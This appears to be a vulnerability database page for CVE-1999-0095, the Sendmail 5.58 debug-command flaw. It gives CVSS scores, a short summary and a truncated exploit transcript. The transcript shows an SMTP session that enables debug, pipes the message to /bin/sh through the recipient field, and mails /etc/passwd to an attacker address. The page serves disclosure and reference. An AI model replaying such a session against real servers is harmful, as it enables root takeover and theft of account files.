10
CVSSv2

CVE-1999-0095

Published: 01/10/1988 Updated: 11/06/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The debug command in Sendmail is enabled, allowing malicious users to execute commands as root.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

eric allman sendmail 5.58

Exploits

220 mailvictimcom SMTP helo attackercom 250 Hello attackercom, pleased to meet you debug 200 OK mail from: </dev/null> 250 OK rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0"> 250 OK data 354 Start mail input; end with <CRLF><CRLF> mail evil@attackercom </etc/passwd 250 OK quit 221 mailvictimcom Terminating The ...